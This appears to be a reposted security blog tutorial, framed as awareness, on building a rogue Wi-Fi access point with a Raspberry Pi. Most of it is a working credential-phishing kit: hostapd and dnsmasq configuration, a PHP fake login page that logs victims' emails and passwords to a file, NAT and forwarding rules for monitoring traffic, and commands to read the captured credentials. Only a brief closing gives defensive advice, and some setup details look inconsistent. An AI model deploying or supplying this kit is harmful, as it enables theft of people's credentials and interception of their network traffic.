# How to Create a Fake Access Point with a Raspberry Pi for Cybersecurity Awareness

Listen to this Post

🐢▶️ Listen🚀

Ever wondered how easy it is to create a fake Access Point? This project demonstrates how a Raspberry Pi can mimic a real Wi-Fi network, tricking users into connecting and entering their credentials via a captive portal. The setup highlights the risks of public Wi-Fi and the importance of cybersecurity awareness.

You Should Know: Essential Commands and Steps

1. Setting Up Hostapd (Access Point)

Hostapd allows the Raspberry Pi to act as a wireless access point.

Installation:

sudo apt update && sudo apt install hostapd dnsmasq -y

**Configuration (`/etc/hostapd/hostapd.conf`):**

interface=wlan0 
driver=nl80211 
ssid=Free_Public_WiFi 
hw_mode=g 
channel=6 
macaddr_acl=0 
auth_algs=1 
ignore_broadcast_ssid=0 
wpa=2 
wpa_passphrase=12345678 
wpa_key_mgmt=WPA-PSK 
wpa_pairwise=TKIP 
rsn_pairwise=CCMP 

**Start Hostapd:**

sudo systemctl unmask hostapd 
sudo systemctl enable hostapd 
sudo systemctl start hostapd 

### **2. Configuring Dnsmasq (DHCP & DNS)**

Dnsmasq assigns IP addresses and handles DNS redirection.

**Edit `/etc/dnsmasq.conf`:**

interface=wlan0 
dhcp-range=192.168.1.100,192.168.1.200,255.255.255.0,24h 
server=8.8.8.8 
log-queries 
log-dhcp 

**Restart Dnsmasq:**

sudo systemctl restart dnsmasq 

3. Setting Up a Captive Portal with PHP

A simple PHP script logs credentials entered by victims.

**Install Apache & PHP:**

sudo apt install apache2 php -y 

**Create a Fake Login Page (`/var/www/html/index.php`):**

<?php 
if ($_SERVER["REQUEST_METHOD"] == "POST") { 
$email = $_POST["email"]; 
$password = $_POST["password"]; 
file_put_contents("/var/www/creds.txt", "Email: $email | Password: $password\n", FILE_APPEND); 
header("Location: https://google.com"); 
} 
?> 
<!DOCTYPE html> 
<html> 
<head><title>Login Required</title></head> 
<body>

<h1>Free Wi-Fi Login</h1>

<form method="POST"> 
<input type="email" name="email" placeholder="Email" required> 
<input type="password" name="password" placeholder="Password" required> 
<button type="submit">Connect</button> 
</form>

</body> 
</html> 

### **4. IP Forwarding & NAT (Traffic Monitoring)**

Enable IP forwarding to monitor traffic:

sudo sysctl -w net.ipv4.ip_forward=1 
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT 

### **5. Logging & Monitoring**

Check captured credentials:

tail -f /var/www/creds.txt 

Monitor connected devices:

sudo arp-scan --interface=wlan0 --localnet 

## **What Undercode Say**

This ethical hacking exercise demonstrates how easily attackers can deploy rogue access points in public spaces. Always verify Wi-Fi networks before connecting, use VPNs, and enable HTTPS everywhere. Awareness is the first step toward defense.

### **Expected Output:**

• A functional fake Wi-Fi network (Free_Public_WiFi).
• A captive portal logging credentials (/var/www/creds.txt).
• Network traffic monitoring via `iptables` and dnsmasq.

Stay secure! 🔒

References:

Reported By: Osama Alsaedi – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram